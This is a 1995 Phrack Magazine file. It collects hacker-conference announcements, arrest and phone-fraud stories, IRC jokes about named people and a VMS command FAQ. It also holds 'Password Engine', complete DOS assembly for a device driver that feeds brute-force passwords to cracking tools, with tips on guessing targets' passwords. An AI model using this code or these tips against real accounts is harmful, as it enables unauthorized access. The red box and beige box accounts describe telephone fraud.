==Phrack Magazine==

Volume Six, Issue Forty-Seven, File 3 of 22

PART I

------------------------------------------------------------------------------

Phrack Magazine and Computer Security Technologies proudly present:

The 1995 Summer Security Conference

"SUMMERCON"

June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia

This is the official announcement and open invitation to the 1995 incarnation of Summercon. In the past, Summercon was an invite-only hacker gathering held annually in St. Louis, Missouri. Starting with this incarnation, Summercon is open to any and all interested parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators, Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers, Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers, Programmers, Conspiracy Nuts, Musicians and Nudists.

LOCATION:

The Clarion Hotel is located in downtown Atlanta, 9 miles from Hartsfield International Airport and just a few blocks from the Peachtree Center MARTA Station.

Considering the exorbitant expenses involved with attending other conferences of this type, Rooms at Summercon are reduced to

$65 per night for Single or Double Occupancy

The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
Atlanta, GA 30303
(404) 659-2660 or (800) 241-3828
(404) 524-5390 (fax)

No one likes to pay a hundred dollars a night. We don't expect you to have to. Spend your money on room service, drinks in the hotel bar, or on k-rad hacker t-shirts. Remember: Mention that you are attending Summercon in order to receive the discount.

DIRECTIONS

75/85 Southbound - Exit 97 (Courtland).
Go 3 blocks south on Courtland then turn left on Houston (John Wesley Dobbs Ave.)

20 East - Exit 75/85 North at International. Turn Left on Courtland at Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)

20 West - Exit 75/85 North at International. One block to Courtland and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)

Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's International Airport will drop you off at many hotels in the downtown area, including the Clarion. The shuttle should be no more than 12 dollars. Fares may be paid at the Airport Shuttle in the Ground Transportation area of the Airport Terminal.

MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a convenient and inexpensive way to negotiate most of the Atlanta area. Take the MARTA train from the Airport to the Peachtree Center Station. Walk three blocks down Houston to the intersection of Houston and Courtland. The MARTA fare will be roughly 2 dollars.

Taxis - The average cab fare from Atlanta's Airport to the downtown area is roughly 30 dollars.

CONFERENCE INFO

It has always been our contention that cons are for socializing. "Seekret Hacker InPh0" is never really discussed except in private circles, so the only way anyone is going to get any is to meet new people and take the initiative to start interesting conversations.

Because of this, the formal speaking portion of Summercon will be held on one day, not two or three, leaving plenty of time for people to explore the city, compare hacking techniques, or go trashing and clubbing with their heretofore unseen online companions.

The "Conference" will be held on June 3rd from roughly 11:00 am until 6:00 pm with a 1 hour lunch break from 1:00 to 2:00.

NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping and still photography will be permitted.

CURRENT LIST OF SPEAKERS:

Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source Solutions (a private sector intelligence firm)
    Topic: Hackers from the Intelligence Perspective

Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise", Publisher of Security Insider Report, and noted security expert
    Topic: Electromagnetic Weaponry

Bob Stratton - Information Security Expert from one of America's largest Internet service providers
    Topic: The Future of TCP/IP Security

Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks"
    Topic: Cryptography, Banking, and Commerce

Annaliza Savage - London-based Director/Producer
    Topic: Discussion of her documentary "Unauthorized Access" (Followed by a public screening of the film)

Chris Goggans - Editor of Phrack Magazine and Summercon M.C.
    Topic: introductions, incidentals and a topic which is sure to culminate in an international incident.

(Other Speakers May Be Added - Interested parties may contact scon@fc.net)

COSTS

Since other cons of this type have been charging from 25 to 40 dollars entry fees, we are only charging 10 dollars. Yes, that's correct, TEN (10) dollars in US currency. Money is far too scarce among the hacker community to fleece everyone for money they will probably need to eat with or pay for their hotel rooms.

WHAT TO DO IN ATLANTA:

To attempt to make everyone's stay in Atlanta more exciting, we are contacting local establishments to arrange for special discounts and/or price reductions for Summercon attendees. Information will be handed out regarding these arrangements at the conference.

Atlanta is a happening town.

Touristy Stuff                  Party Time

The World of Coca-Cola          Buckhead
Underground Atlanta             The Gold Club
Georgia Dome (Baseball?)        (Countless Other Clubs and Bars)
Six Flags

CONTACTING SUMMERCON SPONSORS

You can contact the Summercon sponsors by several means:

E-mail:     scon@fc.net
WWW:        http://www.fc.net/scon.html
Snail Mail: Phrack Magazine
            603 W. 13th #1A-278
            Austin, TX 78701

If deemed severely urgent, you can PGP your email with the following PGP key:

See you in Atlanta!

------------------------------------------------------------------------------

UNAUTHORIZED ACCESS

"Unauthorized Access [is] a documentary that tells the story of the computer underground from our side, it captures the hacker world from Hamburg to Los Angeles and virtually everywhere in between."
                                                  2600 The Hacker Quarterly

Computers are becoming an integral part of our everyday existence. They are used to store and send a multitude of information, from credit reports and bank withdrawals, to personal letters and highly sensitive military documents. So how secure are our computer systems?

The computer hacker is an expert at infiltrating secured systems, such as those at AT&T, TRW, NASA or the DMV. Most computer systems that have a telephone connection have been under siege at one time or another, many without their owner's knowledge. The really good hackers can reroute the telephone systems, obtain highly sensitive corporate and government documents, download individual's credit reports, make free phone calls globally, read private electronic mail and corporate bulletins and get away without ever leaving a trace.

So who are these hackers? Just exactly WHAT do they do and WHY do they do it? Are they really a threat?
What do they DO with the information that they obtain? What are the consequences of their actions? Are hackers simply playing an intellectual game of chess or are hackers using technology to fight back and take control of a bureaucratic system that has previously appeared indestructible?

Unauthorized Access is a documentary that demystifies the hype and propaganda surrounding the computer hacker. Shot in 15 cities and 4 countries, the film hopes to expose the truths of this subculture focusing on the hackers themselves.

Unauthorized Access is a view from inside the global underground.

For a PAL (European) copy send a cheque/postal order for 15 British Pounds or $25 for NTSC (American) standard to:

Savage Productions
Suite One
281 City Road
London EC1V 1LA

------------------------------------------------------------------------------

ACCESS ALL AREAS
Hacking Conference
1st - 2nd July, 1995
(Saturday & Sunday)
King's College, London, UK

-------------------------------WHAT-IT-IS---------------------------------

The first UK hacking conference, Access All Areas, is to be run in London later this year. It is aimed at hackers, phone phreaks, computer security professionals, cyberpunks, law enforcement officials, net surfers, programmers, and the computer underground.

It will be a chance for all sides of the computer world to get together, discuss major issues, learn new tricks, educate others and meet "The Enemy".

-------------------------------WHERE-IT-IS--------------------------------

Access All Areas is to be held during the first weekend of July, 1995 at King's College, London. King's College is located in central London on The Strand and is one of the premier universities in England.

-----------------------------WHAT-WILL-HAPPEN-----------------------------

There will be a large lecture theatre that will be used for talks by computer security professionals, legal experts and hackers alike.
The topics under discussion will include hacking, phreaking, big brother and the secret services, biometrics, cellular telephones, pagers, magstrips, smart card technology, social engineering, Unix security risks, viruses, legal aspects and much, much more.

Technical workshops will be running throughout the conference on several topics listed above.

A video room, equipped with multiple large screen televisions, will be showing various films, documentaries and other hacker related footage.

The conference facilities will also include a 10Mbps Internet link connected to a local area network with various computers hanging off of it and with extra ports to connect your laptop to.

------------------------------REGISTRATION--------------------------------

Registration will take place on the morning of Saturday 1st July from 9:00am until 12:00 noon, when the conference will commence. Lectures and workshops will run until late Saturday night and will continue on Sunday 2nd July from 9:00am until 6:00pm.

----------------------------------COST------------------------------------

The price of admission will be 25.00 British pounds (approximately US $40.00) at the door and will include a door pass and conference programme.

-----------------------------ACCOMMODATION--------------------------------

Accommodation in university halls of residence is being offered for the duration of the conference. All prices quoted are per person, per night and include full English breakfast. (In British pounds)

                        SINGLE      TWIN
WELLINGTON HALL         22.00       16.75

Special prices for British and Overseas university students, holding current student identification, are also available - please call King's Campus Vacation Bureau for details.

All bookings must be made directly with the university. They accept payment by cash, cheque and credit card.

To make a booking call the following numbers...

KING'S CAMPUS VACATION BUREAU

Telephone : +44 (0)171 351 6011
Fax       : +44 (0)171 352 7376

----------------------------MORE-INFORMATION------------------------------

If you would like more information about Access All Areas, including pre-registration details then please contact one of the following...

Telephone : +44 (0)973 500202
Fax       : +44 (0)181 224 0547
Email     : info@phate.demon.co.uk

------------------------------------------------------------------------------

D I S T R I B U T E   W I D E L Y

*****FIRST CALL FOR PAPERS*****

InfoWarCon '95
A 2 Day International Symposium on Information Warfare
September 7-8, 1995
Stouffer Concourse Hotel
Arlington, VA

Presented by:
National Computer Security Association
Winn Schwartau and Interpact, Inc.
Robert Steele and OSS, Inc.

CONFERENCE OVERVIEW:

The Information Warfare Conference (InfoWarCon) is our third international conference dedicated to the exchange of ideas, policies, tactics, weapons, methodologies and defensive posture of Information Warfare on a local, national, and global basis.

InfoWarCon will bring together international experts from a broad range of disciplines to discuss and integrate concepts in this rapidly evolving field. Attendees will intensely interact with the speakers and presenters as well as each other to increase each other's understanding of the interrelatedness of the topics.

While there are many interpretations of Information Warfare by different groups, the current working definition we employ is:

    Information Warfare is the use of information and information systems as weapons in a conflict where information and information systems are the targets.

Information Warfare is broken down into three categories, and InfoWarCon speakers and attendees will interactively examine them all:

Class I: Personal Privacy. "In Cyberspace You Are Guilty Until Proven Innocent." The mass psychology of information. Privacy versus stability and law enforcement.

Class II: Industrial and Economic Espionage.
Domestic and international ramifications and postures in a globally networked, competitive society.

Class III: Global Information Warfare. Nation-state versus Nation-state as an alternative to convention warfare, the military perspective and terrorism.

THE CONFERENCE

The conference is designed to be interactive - with extensive interaction between all participants. The preliminary contents and discussions will focus on:

- What is Information Warfare?
- What Are the Targets?
- Protecting the Global Financial Infrastructure
- Military Perspectives on InfoWar
- InfoWar Vs. Non-Lethal Warfare
- Defending the U.S. Infrastructure
- The Intelligence Community and Information
- Open Source Intelligence
- The Psychology of Information
- Privacy Balances
- Information As the Competitive Edge
- International Cooperation
- Denial of Service
- Cyber-Terrorism
- Offensive Terrorism
- Offensive InfoWar Techniques
- Defensive InfoWar Postures
- Education and Awareness Training
- Corporate Policy
- Government Policy
- Global Policy
- Espionage
- Export Controls of Information Flow
- The Legal Perspective
- The New Information Warriors

Plenary sessions will accommodate all attendees, while break-out sessions will provide more intimate presentations and interactivity on topics of specific interests.

SUBMISSIONS:

Submissions for papers are now being accepted. We are looking for excellent speakers and presenters with new and novel concepts of Information Warfare. You may submit papers on the topics listed above, or on others of interest to you, your company or government.

We welcome innovative thought from the private sector, the government (civilian, military and intelligence) and the international community. Submissions must be received by May 1, 1995, and notification of acceptance will occur by June 1, 1995. Please submit 2-3 page presentation outlines to:

winn@infowar.com.

All submissions and the contents of InfoWarCon '95 will be in English.
If you must submit a hard copy: Fax: 813.393.6361 or snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL 34642

All submissions and presentation should be unclassified, as they will become Open Source upon submission and/or acceptance.

SPONSORS:

The Information Warfare Symposium is currently choosing sponsors for various functions.

Continental Breakfast, Day 1 and Day 2
Morning Coffee Break, Day 1 and Day 2
Lunch, Day 1 and Day 2
Afternoon Coffee Break, Day 1 and Day 2
Cocktail Party, Day 1

Each Corporate or Organizational sponsor will be included in all promotional materials and Symposium function. For more information, contact Paul Gates at the NCSA. Voice: 717.258.1816 or email: 747774.1326@Compuserve.com.

EXHIBITS:

Limited space is available for table-top displays for commercial or governmental products, services, educational or other promotion. For further information, contact Paul Gates at the National Computer Security Association. 717.258.1816

REGISTRATION:

Payment made BEFORE July 1, 1995:

( ) $445.00 NCSA Member/OSS Attendee
( ) $545.00 All others

Payment made AFTER July 1, 1995:

( ) $495.00 NCSA Members/OSS Attendees
( ) $595.00 All others

( ) I'M INTERESTED, but would like more information sent to the address above. Please include a free copy of your 32 page "Information Security Resource Catalog".

( ) I'd like to know more about NCSA on-site training, security audits and consulting services. Please have someone give me a call.

MAIL OR FAX TO:

National Computer Security Association
10 South Courthouse Avenue
Carlisle, PA 17013
Phone 717-258-1816 or FAX 717-243-8642
EMAIL: 74774.1326@compuserve.com
CompuServe: GO NCSAFORUM

Winn Schwartau
Interpact, Inc.
Information Security & Warfare
V:813.393.6600 F:813.393.6361
Email: Winn@Infowar.Com

------------------------------------------------------------------------------

Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale of a device to commit Telecommunications fraud charges. He is being held in Delaware County Prison in lieu of $100,000.00 Bail. His story follows.

On the evening of the 13th Bernie S. received a page from his mail drop. Some people he knew from Florida had stopped in at his mail drop thinking it was his address. They were looking to purchase several 6.5 Mhz Crystals. These crystals when used to replace the standard crystal in the RADIO SHACK Hand Telephone dialer, and with some programming, produce tones that trick pay phones into believing they have received coins. These are commonly referred to as "red boxes" and got their name from an actual red box pulled from a pay phone in the late seventies by some curious person.

Ed Cummings met these people at a local 7-11 (which 7-11?) where he was to sell the widely used electronic timing crystals for roughly $4 a piece. The purchaser only had two twenty dollar bills and Ed Cummings no change. Ed Cummings went into the 7-11 to get some change to make the transaction. A police officer noticed a van parked in the parking lot of the 7-11 with more several African Americans inside. As Ed was leaving the 7-11 he noticed fifteen police cars pulling into the parking lot of the 7-11.

Next thing he knew the police were asking him if they could `rifle` through his car. He said no. Moments later, as he was talking to a Detective, he noticed another police officer going through his car. He asked the officer to stop. They did not. In all, the police confiscated a few hundred 6.5Mhz crystals (which he resells for roughly $4 a piece) and a large box of 100 dialers.
The police told him they would get back to him, and he could have his electronics back if the contents of the bag were legal. In the contents of the seized items was one modified dialer, that a customer returned after modification explaining that it did not work, a broken red box.

The next day Ed `Bernie S.` Cummings was over at a friend's house working on their computer when eight to ten plain clothed armed men burst into the house and ordered him and his friends to freeze. They cuffed him and took him to a holding cell (what jail?). There he was left without a blanket or jacket to sleep with in the cold cell.

That evening the Secret Service had been called in when someone figured out what the dialers and crystals would do when put together. The United States Secret Service found his home and entered it, while they were questioning him.

The next morning at his arraignment he was finally told of the charges he was being held upon. They were Two misdemeanor Charges of manufacture, Distribution and Sale of devices of Telecommunications Fraud, and Two Unlawful use of a computer charges. His bail was automatically set to $100,000.00 because Ed Cummings refused to talk with the police without his attorney present.

The Secret Service presented to the judge a 9 page inventory of what they had found in his home. On that inventory there were 14 computers. 2 printers. more Boxes of bios chips for the systems he worked with. Eprom burners which the Federal Agents had labeled "Cellular telephone chip reprogramming adapters". Eproms are used in everything from Automobile computers to personal computers. They also confiscated his toolbox of screw drivers, wire clippers and other computer oriented tools he used for his consulting job.

The Judge dropped the Two unlawful use of a computer charges due to the fact that the evidence was circumstantial and the county had no actual evidence that Ed had ever used the computers in question.

As of 3/27/1995 Ed Cummings is still in Delaware County Prison awaiting his trial. His trial has not yet been scheduled and Ed will most likely not raise the One Hundred Thousand Dollars needed to be released on bail.

------------------------------------------------------------------------------

"Don't believe the hype." - Public Enemy, 1988

This file's purpose is to clear up any misconceptions about the recent situation that has come upon the sociopolitical group known as KoV.

As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for ANYTHING. We have received several tip-offs from private sources regarding a supposed "FBI investigation" of our group that is purported to be active at this very minute. However, with the exception of a few VERY suspicious incidents and coincidences, there has been NO HARD EVIDENCE thus far about ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for the integrity of our innocence, we must stress that nothing has gone down.

Yet.

We have very good reason to believe that a few of those among us are about to be charged with various false accusations by a local university. However the current mental state of the person in charge of this charade is also in question. Therefore it would be logical to assume nothing. The conflicting tip-offs, rumors, warnings and threats that we have received make it even more difficult to get a clear picture of exactly what is going on. We have heard so many things from so many different sources, both credible and questionable, that we would be hard-pressed to give an accurate evaluation of the current state of things.

What we can say for sure, however, is that KoV officially died on Monday, January 23, 1995, along with its communications network, KoVNet. This promises to be a great loss to the open-minded and sociopolitical community as well as the free-thinkers and activists who supported us so generously.
Our reasons for disbanding the group were many, but the foremost was in light of the current situation we are facing.

Consider this last obstacle our final, stalwart stand against the evils of AmeriKKKan government and its various greedy, capitalistic agencies. From the moment of KoV's conception, they have publicly sought to destroy us; to silence our questioning of authority, to oppress our free-thinking minds, and to close off our intellectual channels of communication. They have even gone so far as to stalk us in public places. 'Tis a shame indeed.

If you have any questions or if you wish to contact us for any reason, you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV". I will try to post further updates of this saga to CiPNet, ThrashNet, QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can. We would appreciate any support that other h/p, art or political groups can lend us.

Until then, my friends...

-Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV

------------------------------------------------------------------------------

What happens when you are caught beige boxing.

by Rush 2

Yeah yeah, I'm the only one. But here is a generally interesting description of everything to getting caught to arraignment.

Well about 5 months ago i needed to set up a conference really quick.. it was about 12:00 (never knew there was a 10:00 pm curfew in that area) and went to a 25 pair box at this local strip mall. Well I was out there the box was already open and I was just about to start testing pairs to see which was connected and what wasn't.

All of a sudden, i hear this loud screeching sound of a car coming to a skid from doing about 90mph. I turned and saw that typically dirty squad car about to hit me.. you know the car, mud and dust on the tires and body, coffee and smudge marks all over the windshield. i got on my bike and started to run. Now the thing is I COULD have gotten away..
the pathetic excuse for a cop had run not more than 10 yards after me and decided that I was a threat so he pulled his handgun and yelled. I saw this and thought it would be wiser to stop than get shot.

Within 2 minutes at LEAST 10 squad cars had come to his aid.. i did not know i was less than a half mile from a police station and they were looking for a prowler in the general area. The police did the normal, called me scum, asked me what i was doing, searched me until they were satisfied... then picked me up and threw me in the car... the funny thing was they didn't see my phone until they threw me into the back seat and the cord fell out.. (they never saw the page of notes and 'naughty' material in my pocket though it was about 4 inches thick and sticking out that a blind man could see it.)

Well they got me to the station and pried my info out, and called my father... I came up with a good enough story about some made up user who told me to go across the street and plug in.. then I was told I would be dealt with in the next week... I did not receive anything for three and a half months.

Once the time came for the arraignment (for a juvenile they called it an intake). I got to go to the police station, sit for about 3 hours (as if i thought they would be on time) until I waited for my probation officer. Finally she got there and we proceeded to talk. She explained all of the charges and my lawyer (interesting guy) laughed, I was being charged with prowling (could be disputed I was on a public sidewalk and there in that strip mall is a 24 hr laundry mat), loitering (again that could be disputed), and attempted theft of services (though I NEVER even plugged in).

After this was all said i spent the next hour talking with the lady in private. I immediately found she had an interest in computers and was having a problem with her home pc.
So I easily changed the topic to my fascination in computers and solved her problem with her computer, and answered at least 50 questions about them. In the last 10-15 minutes of the conversation all i could get from her were statements about how impressed and how intrigued she was with me. She ended up giving me a look (that was hard to judge but i am staying away from this chick) that was either confusion or attraction, slipped me a card with her home phone number and name and called back in my lawyer and parents.

Once they got back in, all that she really said was I was a great boy, that she would like to see me do more with my time besides computers, and that she was taking my sentence of 12 months formal probation with 300 hours of community service to 3 months of informal probation with 30 hours of community service. That and she said bell was asking her what to do and she would tell them that it was a non issue since I did not plug in and even if I had it would not be their concern unless I had plugged in to the telco access part of the network interface.

Well I have yet to receive official record of having to perform the community service or the probation but I called my probation officer yesterday and said she wasn't putting the community service into the punishment and it has been an equivalent amount of time to just say that since I haven't gotten in trouble since she will count the probation as already served. Luckily she based all other needs of me on the report from a teacher, and with my luck she picked the one teacher, my computers teacher, that no matter what I did or said would lie and say I didn't.

Thanks to erikb for publishing this, and greets to CXrank, paradox, dark phiber, the fat cop (who spilled his coffee and box of donuts coming after me) that made this all possible, and to everyone else.

-rush 2
http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html

Look for My site, unforeseen danger soon to be on a 28.8 slip and by the end of the summer on a 500k slip connect.

------------------------------------------------------------------------------

[Something found on IRC]

Danny Partridge                 Emmanuel Goldstein
(AKA Danny Bonaduce:            (AKA Eric Corley:
a child star from               the child-like publisher
"The Partridge Family"          of 26oo magazine.
----------------------          ------------------

Hosts a boring local            Hosts a boring local
radio program.                  radio program.

Quasi Celebrity                 Quasi Celebrity
Status among                    Status among
70's freaks                     telephone phreaks

Periods of Heavy                Periods of Heavy
Drug Usage                      Drug Usage

Involved in Sex                 Involved in Sex
Scandal with                    Scandal with
another man                     another man

Last name is                    Friends with Phiber
"Bonaduce"                      Optik whose first
                                handle was "Il Duce"

Supplements incoming            Supplements incoming
by doing desperate              by doing desperate
local talk shows                local talk shows
whenever he can.                whenever he can.

------------------------------------------------------------------------------

Top 10 #hack fights that would be the coolest to see.
(And no, Ophie's not in it twice just because she's a girl...)
===========================================================================

10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling featuring KL & TK.
9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the one after that... or, uh...
8.) C-Curve and Elite Entity, "Who's who?"
7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere." (Or: "I'm totally numb, let me hug you!!!")
6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"
5.) Grayarea vs. Netcom "No, *I* want root..."
4.) WWF Wrestling with Len and |al|.
3.) Ophie vs. Voyager, "Night of the Living Dead."
2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."

and the number one #hack fight is

1.) Ophie vs.
all the #hack guys, "10 Bucks on the Girl"

------------------------------------------------------------------------------

P A S S W O R D   E N G I N E   (for IBM PC's)
by Uncle Armpit
+++++++++++++++++++++++++++++++++++++++++++++

The device driver code listed below provides a data stream of passwords. The device driver approach was used to speed up the process of cracking passwords on an incremental basis. The usual approach was to generate the passwords to a file, then read the file, etc. The device driver approach circumvents these file storage problems, and others, such as having enough free disk space and delays from disk i/o. This driver operates completely in memory (approx. 0.5Kb).

How practical is this?
----------------------
This program would be very useful if you think you may know what strategy the user/admin uses for picking out their passwords. Without eliciting some sort of a strategy, forget it-- unless you're desperate enough!!

A "strategy" could consist of any of these possible advantages--

1) default passwords (ie: SIN, student #, birth date, phone number...)
2) the mutation of a lUSERs' known password from another system
3) viewing the mark typing in most of their password with a couple of unseen characters
4) etc...

---------------------------

With the sample device driver provided, passwords starting at 'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length of the password string can be modified by changing the length of the password string itself (that is, the variable "number"). The range of characters in the passwords can also be changed by modifying the following two lines:

;hackdrv.sys
;.
;.
; for ending character--
        cmp byte ptr [number+si],'z'+1  ;+1 past ending char. in range

...and for starting character
        mov byte ptr [number+si],'a'    ;starting char. in range
;
;----------------------

for instance, if you wished to generate numbers from "0000000" to "9999999"

-change the ending character to:
        cmp byte ptr [number+si],'9'+1
-starting character to:
        mov byte ptr [number+si],'0'

and "number" variable from 'aaaaaa' to '0000000' and then recompile..

-----

..or in the third case, if u had observed a lUSER type in most of their password, you may want to rewrite the code to limit the search. IE: limit the keys to a certain quadrant of the keyboard. Modify the code starting at "reiterate:" and ending at "inc_num endp" for this.

=================================================================

/'nuff of this!/ How do I get things working?
-----------------------------------------------

Compile the device driver "hackdrv.sys", and the second program, "modpwd.asm". Then specify the device driver inside config.sys (ie: "c:\hackdrv.sys"). The code below was compiled with the a86 compiler, v3.03. Some modifications might be needed to work with other compilers.

To use it in prgs like crackerjack, type in the following on the command line:

c:\>jack -pwfile: -word:hackpwd

------

If you had stopped a cracker program (eg: crackerjack) and want to pick up from where you left off, run the program "modpwd.com".

This program can change HACKDRVs password through-

a) a command line argument (ie: "modpwd aabbbbe")
b) executing the program with no parameters (this method also displays the current password in memory)

Happy Hacking,
Uncle Armpit

;-----------------------cut here--------------------------------
;Program HACKDRV.SYS
;
        org     0h
next_dev        dd      -1
attribute       dw      0c000h          ;character device w/ ioctl calls
strategy        dw      dev_strategy
interrupt       dw      dev_int
dev_name        db      'HACKPWD '
countr          dw      offset number
number          db      'aaaaaa',0ah    ;<----six characters, lower case
numsize         equ     $-number - 2
afternum:

;working space for device driver
rh_ofs          dw      ?
rh_seg          dw      ?
dev_strategy:                   ;strategy routine
        mov cs:rh_seg,es
        mov cs:rh_ofs,bx
        retf

dev_int:                        ;interrupt routine
        pushf
        push ds
        push es
        push ax
        push bx
        push cx
        push dx
        push di
        push si
        cld
        push cs
        pop ds
        mov bx,cs:rh_seg
        mov es,bx
        mov bx,cs:rh_ofs
        mov al,es:[bx]+2
        rol al,1
        mov di,offset cmdtab
        xor ah,ah
        add di,ax
        jmp word ptr[di]

cmdtab:                         ;command table
        dw init                 ;0
        dw exit3                ;1
        dw exit3                ;2
        dw ioctl_read           ;3
        dw do_read              ;4
        dw exit3                ;5
        dw exit3                ;6
        dw exit3                ;7
        dw exit3                ;8
        dw exit3                ;9
        dw exit3                ;10
        dw exit3                ;11
        dw ioctl_write          ;12
        dw exit3                ;13
        dw 5 dup (offset exit3)

ioctl_read:
        push es
        push bx
        mov si,es:[bx+10h]
        mov di,es:[bx+0eh]
        mov es,si
        push cs
        pop ds
        mov si,offset number
        xor cx,cx
get_char:
        lodsb
        stosb
        inc cl
        cmp al,0ah
        jz ioctl_rend
        jmp get_char
ioctl_rend:
        pop bx
        pop es
        mov es:[bx+012h],cx
        mov cs:countr,offset number
        jmp exit2

ioctl_write:
        push es
        push bx
        mov si,es:[bx+010h]
        mov ds,si
        mov si,es:[bx+0eh]
        mov cx,numsize+1        ;es:[bx+012h]
        push cs
        pop es
        mov di,offset number
        repe movsb
        pop es
        pop bx
        mov cs:countr,offset number
        jmp exit2

do_read:
        push es
        push bx
        push cs
        pop ds
        mov si,[countr]
        inc si                  ;word ptr [countr]
        cmp si,offset afternum
        jnz is_okay
        mov si,offset number
        call inc_num
is_okay:
        mov [countr],si
        mov di,es:[bx]+0eh
        mov ax,es:[bx]+010h
        mov cx, es:[bx]+012h
        jcxz clean_up
        mov es,ax
        repe movsb
clean_up:
        pop bx
        pop es
        jmp exit2

exit3:
        mov es:word ptr 3[bx],08103h
        jmp exit1
exit2:
        mov es:word ptr 3[bx],0100h
exit1:
        pop si
        pop di
        pop dx
        pop cx
        pop bx
        pop ax
        pop es
        pop ds
        popf
        retf
exit:

inc_num proc near
        push si
        mov si,numsize
reiterate:
        inc byte ptr [number+si]
        cmp byte ptr [number+si],'z'+1  ;+1 past ending char. in range
        jnz _exit
        mov byte ptr [number+si],'a'    ;starting char. in range
        dec si
        cmp si,-1
        jnz reiterate
        mov byte ptr [number],01ah      ;send EOF
_exit:
        pop si
        ret
inc_num endp

at_eof:                         ; the non-resident code starts here

initial proc near
        push es
        push cs
        pop ds
        push cs
        pop es
        mov si,offset number
        mov di,offset tmpnum
        cld
_again:
        lodsb
        cmp al,0ah
        jz _nomorechars
        stosb
        jmp _again
_nomorechars:
        mov si,offset msgend
        mov cx,4
        repe movsb
        mov ah,09               ;print welcome message
        mov dx,offset msg1
        int 21h
        pop es
        ret
initial endp

init:
        call initial
        mov ax,offset at_eof
        mov es:[bx]+0eh,ax
        push cs
        pop ax
        mov es:[bx]+010h,ax
        mov cs:word ptr cmdtab,offset exit3
        jmp exit2

msg1    db "Incremental Password Generator (c)1995",0ah,0dh
        db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
        db "Starting at word ["
tmpnum  db 10 dup (?)
msgend  db "]",0a,0d,'$'
;END hackdrv.sys

;------------------------------cut here----------------------------------
;PROGRAM modpwd.asm
;
        org 0100h
        mov ax,03d02h
        xor cx,cx
        mov dx,offset devname
        int 21h
        jnc drvr_found
        mov ah,09
        mov dx,offset no_drvr
        int 21h
        jmp error_pass
drvr_found:
        mov bx,ax
        mov ax,04402h
        mov cx,20               ;read 20 characters
        mov dx,offset databuffr
        int 21h
        mov pass_len,al
        dec al
        mov ah,al
        and al,0fh
        mov cl,4
        shr ah,cl
        add ax,03030h
        cmp al,'9'
        jbe inrange
        add al,7
inrange:
        cmp ah,'9'
        jbe inrange1
        add ah,7
inrange1:
        mov byte ptr [num_chr],ah
        mov byte ptr [num_chr+1],al
        cld
        mov di,offset databuffr-1
        xor cx,cx
        mov cl,pass_len
        add di,cx
        mov si,offset pass_end
        mov cx,stringsz
        repe movsb
                                ;check for information in command line
                                ;else--> prompt for user input
        mov al,pass_len
        or byte ptr [0080h],0
        jz req_input
        mov cl,[0080h]
        dec cl
        mov [0081h],cl
        mov si,0081h
        mov di,offset newpass
        mov cx,20
        repe movsb
        jmp vrfy_info
req_input:
        mov ah,09
        mov dx,offset cur_pass
        int 21h
        mov ah,0a
        mov dx,offset pass_len
        int 21h
vrfy_info:
        mov ax,word ptr [pass_len]
        cmp ah,0
        jz error_pass
        dec al
        cmp ah,al
        jnz error_len
                                ;change the current password
        xor cx,cx
        mov cl,al
        mov ah,044h
        mov al,03
        mov dx,offset newpass+1
        int 21h
        jnc success_pass
error_len:
        mov ah,09
        mov dx,offset errormsg
        int 21h
error_pass:
        mov ax,04c01h           ;abnormal termination
        int 21h
success_pass:
        mov ax,04c00h
        int 21h

devhandle dw ?
cur_pass  db 'Current password is ['
databuffr db 20 dup (?)
pass_end  db '] ;'
num_chr   db ' '
          db ' characters',0ah,0dh,0ah,0dh
prompt    db 'New word: ','$'
stringsz  equ $ - pass_end
pass_len  db 00
newpass   db 20 dup (?)
errormsg  db 'error changing password!',0ah,0dh,'$'
no_drvr   db 'Error: '
devname   db "HACKPWD ",00
          db 'device driver not loaded!',0ah,0dh,07,'$'

------------------------------------------------------------------------------

        -- Frequently & Rarely asked questions about VMS -- part one
                  by Opticon the Disassembled - UPi

[1]

" I have a kropotkin.hlp file. What could I possibly do with it ? "

$ library /insert /help sys$help:helplib.hlb kropotkin.hlp
.
.
.
$ help kropotkin

[2]

" I have a bakunin.tlb file. What to do with it ? "

$ library /extract=(*) bakunin.tlb
.
.
.
$ dir

[3]

" I would like to have a look at prunton.dat. "

$ dump [/block=(count:x)] prunton.dat

Where "x" is the number of blocks DUMP will display.

[4]

" How can I use an external editor with mail ? "

$ mail :== mail /edit=(send,reply=extract,forward)

[5]

" How a HELP file is organized ? "

$ create example.hlp
1 EXAMPLE
THIS IS AN EXAMPLE.
2 MORE_EXAMPLES
MORE EXAMPLES.
3 EVEN_MORE_EXAMPLES
EVEN MORE EXAMPLES.

[6]

" How can I have a look at queues ? "

$ show queue smtp /all/full

or

$ show queue /batch/all/full

or

$ show queue /all/full

[7]

" My mail is held, for some reason, in the SMTP queue... "

Either

$ delete /entry=XXX

or

$ set entry XXX /release

in order to force VMS to release it right away.

[8]

" How do I have a look at DTE and circuits available. "

$ mc ncp show known dte

and

$ mc ncp show known circuits

